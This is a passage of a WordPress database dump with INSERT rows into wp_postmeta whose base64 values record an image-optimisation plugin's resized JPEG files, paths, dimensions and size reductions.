3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvODcwMTE2OS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG84NzAxMTY5LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzg3MDExNjktMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI3MzQsImlkIjoxMzY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzg3MDExNjktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvODcwMTE2OS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG84NzAxMTY5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzM2LCJpZCI6MTM2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG84NzAxMTY5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzg3MDExNjktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvODcwMTE2OS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjczOSwiaWQiOjEzNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvODcwMTE2OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG84NzAxMTY5LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzg3MDExNjktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI3NDEsImlkIjoxMzY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzg3MDExNjktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvODcwMTE2OS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG84NzAxMTY5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzQ0LCJpZCI6MTM2NH1d'); 
INSERT INTO `wp_postmeta` VALUES (29587, 1363, 'wpfc_optimisation_reduction', '47895'); 
INSERT INTO `wp_postmeta` VALUES (29588, 1363, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIyNTcsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAuanBnIiwicmVkdWN0aW9uIjo0Nzg1OCwidGltZSI6MTQ4MzU3Mjc1MywiaWQiOiIxMzYzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI3NTUsImlkIjoxMzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC04MDB4NjAyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjAyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC04MDB4NjAyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC04MDB4NjAyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjc1OCwiaWQiOjEzNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTc2OHg1NzguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTc2OHg1NzguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTc2OHg1NzguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzYxLCJpZCI6MTM2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMTYwMHgxMjA0LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMDQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTE2MDB4MTIwNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMTYwMHgxMjA0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjc2NCwiaWQiOjEzNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzY2LCJpZCI6MTM2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI3NjksImlkIjoxMzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjc3MSwiaWQiOjEzNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzc0LCJpZCI6MTM2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MjQsInRpbWUiOjE0ODM1NzI3NzYsImlkIjoxMzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzc5LCJpZCI6MTM2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjc4MSwiaWQiOjEzNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYyMDAtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI3ODMsImlkIjoxMzYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MjAwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyNzg2LCJpZCI6MTM2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjIwMC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjc4OCwiaWQiOjEzNjN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29589, 1361, 'wpfc_optimisation_reduction', '84690'); 
INSERT INTO `wp_postmeta` VALUES (29590, 1361, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5NDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQuanBnIiwicmVkdWN0aW9uIjo4NDY3NiwidGltZSI6MTQ4MzU3Mjc5OSwiaWQiOiIxMzYxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI4MDEsImlkIjoxMzYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC04MDB4NTE3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01MNC04MDB4NTE3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01MNC04MDB4NTE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjgwNCwiaWQiOjEzNjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTc2OHg0OTcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0OTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTc2OHg0OTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUw0LTc2OHg0OTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODA3LCJpZCI6MTM2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMTYwMHgxMDM1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMzUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTE2MDB4MTAzNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQtMTYwMHgxMDM1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjgxMSwiaWQiOjEzNjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUw0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUw0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyODEzLCJpZCI6MTM2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NTDQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NTDQtMjAweDIwMC5qcGciLC